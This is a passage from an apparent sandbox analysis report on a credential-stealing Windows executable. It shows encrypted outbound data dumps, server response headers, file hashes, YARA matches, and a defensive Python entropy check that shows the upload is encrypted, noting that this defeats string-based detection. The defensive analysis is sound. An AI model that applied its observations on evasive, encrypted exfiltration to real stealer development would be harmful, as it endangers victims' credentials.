    Data Ascii: }*/{v|oGxifWEFDl] u&}:.F'61]}x%uf^|hbk>ox(.vIb,IONFf?K__6#84xSx:pwC|A!d5B'%;J<{$B- 0 (Ld
2024-12-23 06:19:00 UTC | 15331 | OUT | Data Raw: 71 3e 9f 2b d5 5a 0f b7 bc 6a b8 49 12 e3 8a f3 1f 50 20 f2 5a 7b 4d 8d 27 0f 81 7c af 50 da 13 36 2c f6 7c 44 e6 af 3c c3 76 00 46 be 75 ed e8 60 24 48 ad 7d 73 2a e9 7a ac 82 7a 02 a0 b6 1a 45 7f 21 75 12 d4 c3 aa bd e6 12 1b 43 ff f6 48 de e4 59 d0 1a 5a 3f 47 27 19 7d 84 93 49 e9 2c c3 1b c1 f5 8b e1 9c bc 0c 3d de 8c 98 88 a6 b6 e5 c4 c5 23 49 73 61 de 3f d7 1b 75 49 2a 5b 39 3e 0b 1e 49 79 3f 6c 86 c4 b6 2e 65 f7 5c 2c d4 04 ab 30 21 e1 b3 1b 9c 7f 37 b6 97 5d 94 fa 65 5e e5 f5 c5 e1 9f 66 20 08 11 b8 c8 d8 d4 19 16 97 a4 ce 87 89 be 80 a4 26 70 37 0b 84 f2 2e aa e4 de 00 1a 29 bb a4 fe 88 fc d9 b4 88 1f e6 06 d7 52 08 c3 dc c9 af 73 c3 c5 bb d9 ed eb 6a 96 ba 00 b6 e0 ce cc 35 5d 70 11 d5 7b 14 34 04 ac 7b 0d 64 7f 95 0b 76 4a 3a ce 61 0f 38 43 27
    Data Ascii: q>+ZjIP Z{M'|P6,|D<vFu`$H}s*zzE!uCHYZ?G'}I,=#Isa?uI*[9>Iy?l.e\,0!7]e^f &p7.)Rsj5]p{4{dvJ:a8C'
2024-12-23 06:19:00 UTC | 15331 | OUT | Data Raw: f5 e6 55 60 64 06 65 3c d0 c0 3c a2 6e 5c 76 be b5 4b 88 8a 2b e5 9d 0d f9 df c2 71 a3 55 1c 70 b5 85 1d 40 a2 53 c2 65 8d 0a b4 8b 80 fa 42 01 ba cc 9b 71 9a 6c 02 0a 24 ff fe e0 e3 7a 8c 0c 6e 75 a7 d6 70 b5 f3 29 34 38 a8 21 00 e1 c9 86 75 d5 1d 32 50 46 29 90 14 8f c5 f0 1c dd 6a 09 4e 7d a1 33 fb f3 7a 23 ed 85 ed 81 aa ce 58 ae e3 7c 90 7a 08 4e ce dc 0c 97 51 2f 15 a4 96 3c e9 2e 17 c5 54 40 7c 6b c5 e5 92 e4 c3 88 cd 63 2b 6e 0e 11 4c a1 36 18 98 49 c5 a7 7b cf d7 50 6c 53 1a c2 45 46 ce dd 48 21 4b 0b 1f e6 e2 b5 30 3d 7a c2 0d 45 22 a7 f0 47 0f d7 ef aa d6 dd ef 41 dc 8d ea 7a 4e f8 77 28 14 11 2a 86 75 9a 2f 7b 66 de 2f 9a 8b b1 1c 08 51 13 40 34 17 91 2d 1c 22 f4 b6 2d 7a 8e 6a 22 ad 9a d2 8f 6f 89 4e 29 8d 7e 28 62 89 cd 79 9f 6b 3f 04 ae df
    Data Ascii: U`de<<n\vK+qUp@SeBql$znup)48!u2PF)jN}3z#X|zNQ/<.T@|kc+nL6I{PlSEFH!K0=zE"GAzNw(*u/{f/Q@4-"-zj"oN)~(byk?
2024-12-23 06:19:00 UTC | 15331 | OUT | Data Raw: 9c 35 af e9 32 53 5a 2f 1f 3c ff 3b 6d 71 cd b2 14 9a 2f 80 db 0e 47 2e 67 f8 a0 2b f6 58 04 2d 5f b9 62 83 07 2f cb fe 3d 58 ef 86 7c 35 3b 10 92 04 92 f8 d1 72 f6 be 8a 2f 63 f6 e1 ba 16 c4 d6 f8 51 fe 44 88 f7 7f b8 4e a3 a9 a2 6f ab d6 8c 9d 94 d6 68 73 60 6e d2 d5 7a f8 86 cf 66 4b fc c5 5b e4 3e 93 46 8b 3c 42 6a 00 c7 f2 99 9a 7a 53 76 5c 6c 6c 78 8e 11 35 36 28 43 02 ff ab bb 48 7b b5 98 d0 d6 ba a1 d7 42 c6 09 5c 1a 55 9b fb 05 a6 2f 63 9e 2b 0a 82 c4 87 54 8e f0 2c 89 cc b0 12 06 03 aa 02 f0 d9 b4 a6 2e fa e1 76 93 90 c3 73 d7 4c 4d b0 70 22 b4 a3 14 84 90 82 69 31 f0 1e 81 a4 7d 04 1c d0 b9 05 31 3f a9 82 7d 02 a6 0e 80 39 fc e9 36 1a f8 d1 69 d4 cc 77 7c 2d d0 d7 ff dc ac 7d b6 3f fc 89 4b c9 ca 1c 89 b0 c1 aa 9a 32 41 05 6d 34 54 5f 5b c6 c9
    Data Ascii: 52SZ/<;mq/G.g+X-_b/=X|5;r/cQDNohs`nzfK[>F<BjzSv\llx56(CH{B\U/c+T,.vsLMp"i1}1?}96iw|-}?K2Am4T_[
2024-12-23 06:19:00 UTC | 15331 | OUT | Data Raw: 65 7c 14 6a 3b 56 4d bb 49 cd 25 72 72 e5 c7 3b aa ba 1c 65 11 6f b8 72 da 78 3e aa b3 7d ef 4e d3 cb af a5 3a b7 df 71 9e 89 0d 37 1f 11 69 79 03 0e f6 46 2b cc fd 34 2c a9 c2 1c 40 89 24 e2 70 44 a6 52 91 37 e6 b9 94 fd 17 43 3c f6 2c 59 b7 77 cd cb 83 3f a1 97 49 eb 41 25 d1 21 56 f3 19 58 48 be 1c c4 86 bf 1e f7 47 d0 ce 1c 7e b5 63 39 61 b7 fb fb 54 4b 92 09 1a 29 38 b3 45 b6 65 aa 24 7a 54 4a f6 bb 02 86 ff ac 2a a4 6a 41 ec d2 9a 2e 7d 5d d3 59 22 17 1d 27 c4 59 e8 8b 72 96 7e e2 27 59 a7 e6 01 2e 3f a2 42 3c 43 39 c2 fa 7c 80 1d 20 94 20 9b c3 f3 8b 5e d1 61 35 53 fe 9d f1 41 ea b5 2b 87 01 cc 91 eb 73 e3 0e cb 39 88 01 12 6b a8 d5 ba fc c8 08 7f 7e 60 61 81 a2 12 b5 81 84 4d d2 14 2f 7c 3e a1 a4 30 79 8e ba 4f 17 c7 3c 6b 47 25 bd fc 16 7e 00 cd
    Data Ascii: e|j;VMI%rr;eorx>}N:q7iyF+4,@$pDR7C<,Yw?IA%!VXHG~c9aTK)8Ee$zTJ*jA.}]Y"'Yr~'Y.?B<C9| ^a5SA+s9k~`aM/|>0yO<kG%~
2024-12-23 06:19:00 UTC | 15331 | OUT | Data Raw: 30 87 85 5e 40 51 b7 85 c0 0c 9c 02 39 45 02 ec da 93 89 0e b1 38 f5 17 1a 52 26 e8 ef b3 d9 a0 0d 69 56 91 9f 6c 99 84 3e f3 59 f2 dd 72 a2 e0 b4 21 da b9 93 69 82 e2 15 ed 19 cc af ed 3c a2 97 04 35 26 d0 00 3c b5 ea b9 55 61 37 b5 09 c1 52 c7 ac d1 e6 a0 c7 ef 82 a5 38 db b0 ed 6b f9 08 4a 12 aa 57 d8 c3 a8 8b 2d 7f eb 12 08 e7 bf e9 79 41 7b f8 ce 32 b7 fb 26 7f 08 e5 40 1f 34 65 89 fb 39 b1 8a 5c 3b 20 7e 3f dc 5f 82 c3 ac e4 b7 6f b3 01 58 e8 e7 33 92 5a 46 84 b1 06 22 31 c0 84 57 2e 49 b5 1f a9 15 4e ad 45 b7 a0 b9 b3 20 87 96 4a 48 39 41 8d 4c 9e b3 f8 c0 f8 ee 9a b3 0c 69 12 f6 16 ba be 0a de a6 22 87 98 a2 b7 28 16 ff 50 97 93 7e 39 d2 82 30 ff 10 2a cb ad 97 4a d0 ec 60 63 8b 41 2a 2b b5 75 a2 6a ef e1 ab aa b1 11 76 23 8d 41 51 21 72 e0 a5 73
    Data Ascii: 0^@Q9E8R&iVl>Yr!i<5&<Ua7R8kJW-yA{2&@4e9\; ~?_oX3ZF"1W.INE JH9ALi"(P~90*J`cA*+ujv#AQ!rs
2024-12-23 06:19:00 UTC | 15331 | OUT | Data Raw: 5d a2 b6 98 2b c7 f9 94 af d8 89 71 4e b9 10 67 cd e9 87 ff 4f 06 22 fc 91 d2 52 25 04 8c 1d fd 55 39 7f dc a4 3b 28 82 64 6d e9 6a 45 88 9a ff 51 01 79 1a 0d 72 de 90 f4 af bc 88 89 fe a4 b2 16 f0 a0 34 e2 0e d9 0a 69 3b 78 5b bf ad f5 08 8a 50 dd 2e 73 cb e5 4d 1e 08 2b 7a 40 cb 47 a1 f4 6e 18 36 b0 26 b0 a7 40 a8 bf 10 50 5e 06 05 e1 98 ff bd 02 87 d4 86 f8 75 ac 1f 02 46 6e 37 33 54 07 fa 41 19 b7 70 9d c9 ce 23 87 30 a4 7e 86 b1 dd 5b 3a 04 ab 21 70 5d 9a 6d 23 66 64 95 dd cb 7e 13 ce c7 65 24 ea 3e f0 bc 6c 2d b9 7c 36 02 b5 f0 b6 50 6e 0c 31 ac a2 9f 4a 6b db c7 7b a9 dc 76 44 9d 9a 88 f8 a4 43 f9 d8 0a dd ad 60 9c 1e 90 f0 66 3f ca 58 f6 52 a7 be 58 ef d4 36 bd e0 08 21 9e fd 8c c9 23 9b 77 6e 96 aa bc 3b 1c 6d bb 8b 75 00 d7 64 14 d1 c5 e3 db b4
    Data Ascii: ]+qNgO"R%U9;(dmjEQyr4i;x[P.sM+z@Gn6&@P^uFn73TAp#0~[:!p]m#fd~e$>l-|6Pn1Jk{vDC`f?XRX6!#wn;mud
2024-12-23 06:19:00 UTC | 15331 | OUT | Data Raw: 4f 62 0c 79 8c eb 5a df ad cb fa 94 8b a7 06 0c 11 fe 97 0b e8 45 fb 3f ff e8 16 00 2f 5c 68 82 9c 8b 22 73 3f 77 a4 52 a3 a9 82 e0 38 8c fb 77 62 3a a5 b5 be f6 be 18 81 57 d0 fd b9 fb 13 b7 af 1a 1b 71 4f 50 58 96 53 9c 86 7b cd 74 c4 86 be 3c ad e3 ae 8f 15 49 ee f5 33 13 22 04 a6 5f 88 47 03 7c b7 ff 7c df 83 f3 c5 50 e8 bf 9b e7 47 12 a6 51 31 82 40 ff 88 1d c6 90 79 c7 ba 0a 80 d2 06 05 26 3e f1 2e 9d 9f 94 4e aa 9d e0 e8 fd bb 05 91 9e 40 c0 23 98 51 b2 f8 50 ca 73 bd 44 02 be d0 c2 78 83 c0 07 e3 bb 35 e8 3c 77 56 61 50 9e f2 3e 61 4d 44 7e 2a b3 cb 63 b5 f1 8b ce 73 3d e8 94 20 42 49 44 48 03 14 d8 b2 93 f5 38 6f d7 1a a4 62 31 cc 52 d0 fa 39 6c 92 9d 7f 13 dd bd 5a b3 d3 98 db c9 83 a5 3a 24 45 95 da 80 03 04 5b 12 e0 12 60 52 25 74 ed 88 b3 d3
    Data Ascii: ObyZE?/\h"s?wR8wb:WqOPXS{t<I3"_G||PGQ1@y&>.N@#QPsDx5<wVaP>aMD~*cs= BIDH8ob1R9lZ:$E[`R%t
2024-12-23 06:19:03 UTC | 1129 | IN | HTTP/1.1 200 OK
    Date: Mon, 23 Dec 2024 06:19:02 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=chsn3fbuqk4gf4aptnf3fnrhn0; expires=Fri, 18 Apr 2025 00:05:41 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
                                                                                                                                                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                  vary: accept-encoding
                                                                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bBgehdgw00gOuhoXQV0al6vlMfFW7pzCrWAPyQtBkmxrUbSYzCTrJZpUi9PPisQVDiL2IKUN22IQ7bl2qFJTgVch7zbHDqAgEPcgt%2Bg9jpJS4E%2B4Aeyd1sgWgD0NBHI3UNI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                                  CF-RAY: 8f663cd25ee241de-EWR
                                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1849&min_rtt=1588&rtt_var=782&sent=353&recv=612&lost=0&retrans=0&sent_bytes=2834&recv_bytes=590834&delivery_rate=1838790&cwnd=225&unsent_bytes=0&cid=07d2c59fa8ab86ba&ts=2352&x=0"
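The outbound stream record above is the interesting half of this exchange: the sample uploads a blob and the PHP backend behind Cloudflare answers with an empty-looking 200. A quick way to confirm that the upload body is encrypted rather than a plaintext form post is to decode the report's "Data Raw" listing and measure its byte entropy and printable ratio. The following Python is an added example written for this page, not Joe Sandbox code; the hex constant is a copy of the "Data Raw" line above, and the short plaintext string used for comparison is constructed.

```python
import math
from collections import Counter

# Copied from the "Data Raw:" line of the OUT stream record in the report above.
DATA_RAW_HEX = (
    "4f 62 0c 79 8c eb 5a df ad cb fa 94 8b a7 06 0c 11 fe 97 0b e8 45 fb 3f "
    "ff e8 16 00 2f 5c 68 82 9c 8b 22 73 3f 77 a4 52 a3 a9 82 e0 38 8c fb 77 "
    "62 3a a5 b5 be f6 be 18 81 57 d0 fd b9 fb 13 b7 af 1a 1b 71 4f 50 58 96 "
    "53 9c 86 7b cd 74 c4 86 be 3c ad e3 ae 8f 15 49 ee f5 33 13 22 04 a6 5f "
    "88 47 03 7c b7 ff 7c df 83 f3 c5 50 e8 bf 9b e7 47 12 a6 51 31 82 40 ff "
    "88 1d c6 90 79 c7 ba 0a 80 d2 06 05 26 3e f1 2e 9d 9f 94 4e aa 9d e0 e8 "
    "fd bb 05 91 9e 40 c0 23 98 51 b2 f8 50 ca 73 bd 44 02 be d0 c2 78 83 c0 "
    "07 e3 bb 35 e8 3c 77 56 61 50 9e f2 3e 61 4d 44 7e 2a b3 cb 63 b5 f1 8b "
    "ce 73 3d e8 94 20 42 49 44 48 03 14 d8 b2 93 f5 38 6f d7 1a a4 62 31 cc "
    "52 d0 fa 39 6c 92 9d 7f 13 dd bd 5a b3 d3 98 db c9 83 a5 3a 24 45 95 da "
    "80 03 04 5b 12 e0 12 60 52 25 74 ed 88 b3 d3"
)

# Constructed plaintext for comparison; it is not something the sample sent.
PLAINTEXT_SAMPLE = b"username=user&hwid=1234&os=Windows10"


def parse_data_raw(hex_text: str) -> bytes:
    """Turn a Joe Sandbox 'Data Raw' listing (space-separated hex octets) into bytes."""
    return bytes(int(tok, 16) for tok in hex_text.split())


def render_data_ascii(data: bytes) -> str:
    """Reproduce the report's 'Data Ascii' view: keep printable 7-bit ASCII
    (0x20..0x7e) and drop every other byte. That is why the rendered string is
    far shorter than the byte count and reads as noise."""
    return "".join(chr(b) for b in data if 0x20 <= b <= 0x7E)


def shannon_entropy(data: bytes) -> float:
    """Entropy in bits per byte; 8.0 is the ceiling for uniformly random bytes,
    English text or URL-encoded form data sits around 4 to 5."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def printable_ratio(data: bytes) -> float:
    """Fraction of bytes in the printable ASCII range; ~0.37 is what random
    bytes give (95 of 256 values), plaintext is close to 1.0."""
    if not data:
        return 0.0
    return sum(1 for b in data if 0x20 <= b <= 0x7E) / len(data)


def analyse_stream(hex_text: str) -> dict:
    """Summarise one stream record the way an analyst would eyeball it."""
    data = parse_data_raw(hex_text)
    return {
        "length": len(data),
        "ascii": render_data_ascii(data),
        "entropy": round(shannon_entropy(data), 2),
        "printable_ratio": round(printable_ratio(data), 2),
        "looks_encrypted": shannon_entropy(data) > 7.0 and printable_ratio(data) < 0.6,
    }


if __name__ == "__main__":
    for key, value in analyse_stream(DATA_RAW_HEX).items():
        print(f"{key}: {value}")
    print("plaintext entropy for comparison:",
          round(shannon_entropy(PLAINTEXT_SAMPLE), 2),
          "printable ratio:", round(printable_ratio(PLAINTEXT_SAMPLE), 2))
```

The same two numbers are useful as a cheap triage signal on any POST body captured from an unknown sample: a high entropy together with a printable ratio near what random bytes give means the stealer is encrypting or compressing its exfiltration, so string-based IDS rules on the body will not match and detection has to lean on the URL, headers and connection pattern instead.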
Target ID:0
Start time:01:18:36
Start date:23/12/2024
Path:C:\Users\user\Desktop\0gnHF2twcT.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\Desktop\0gnHF2twcT.exe"
Imagebase:0x70000
File size:1'881'600 bytes
MD5 hash:85BFDE4071D80BB2BDFFB80F68D54D17
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1601941618.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1626344596.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:low
Has exited:true
Strings
Memory Dump Source
• Source File: 00000000.00000003.1629815707.0000000000A5A000.00000004.00000020.00020000.00000000.sdmp, Offset: 00A53000, based on PE: false
• Associated: 00000000.00000003.1698020016.0000000000A53000.00000004.00000020.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_3_a51000_0gnHF2twcT.jbxd
Similarity
• API ID:
• String ID: K.$"
• API String ID: 0-2064305032
• Opcode ID: 20637d7a64f39fbdbcf366d4b106b28d6e4205e61b74bbf14ca7839609cb0a09
• Instruction ID: 4aec1f176fbe1dd5047b2d1404ab4409ca799f21b53dd379419887adc0e05639
• Opcode Fuzzy Hash: 20637d7a64f39fbdbcf366d4b106b28d6e4205e61b74bbf14ca7839609cb0a09
• Instruction Fuzzy Hash: E502123144D7C94FD717DB708A666457F60BB03722F2A42CFC8818F4A7E2689A1AC792

Strings
Memory Dump Source
• Source File: 00000000.00000003.1629815707.0000000000A5A000.00000004.00000020.00020000.00000000.sdmp, Offset: 00A51000, based on PE: false
• Associated: 00000000.00000003.1697927134.0000000000A51000.00000004.00000020.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_3_a51000_0gnHF2twcT.jbxd
Similarity
• API ID:
• String ID: K.$"
• API String ID: 0-2064305032
• Opcode ID: d952aa9fe2da537fc4973a3b390d4e9901048e7bf2d5e78dcde7005fad06d825
• Instruction ID: 4aec1f176fbe1dd5047b2d1404ab4409ca799f21b53dd379419887adc0e05639
• Opcode Fuzzy Hash: d952aa9fe2da537fc4973a3b390d4e9901048e7bf2d5e78dcde7005fad06d825
• Instruction Fuzzy Hash: E502123144D7C94FD717DB708A666457F60BB03722F2A42CFC8818F4A7E2689A1AC792

Memory Dump Source
• Source File: 00000000.00000003.1697983112.0000000000A35000.00000004.00000020.00020000.00000000.sdmp, Offset: 00A35000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_3_a2d000_0gnHF2twcT.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a9d2e35ff53e1cbfe6b479e96df18c90b63f04cc91cd3786fc25d50427fd0156
• Instruction ID: 6a8940c5955fe289d9caa18d3b1f4bb57af20e7ef437cf8330d7aaf34ee41558
• Opcode Fuzzy Hash: a9d2e35ff53e1cbfe6b479e96df18c90b63f04cc91cd3786fc25d50427fd0156
• Instruction Fuzzy Hash: 4721FF7205A3C1AFCB52DF38C9D1A833F61AF4732474A82D8E4805E047D328A623CB92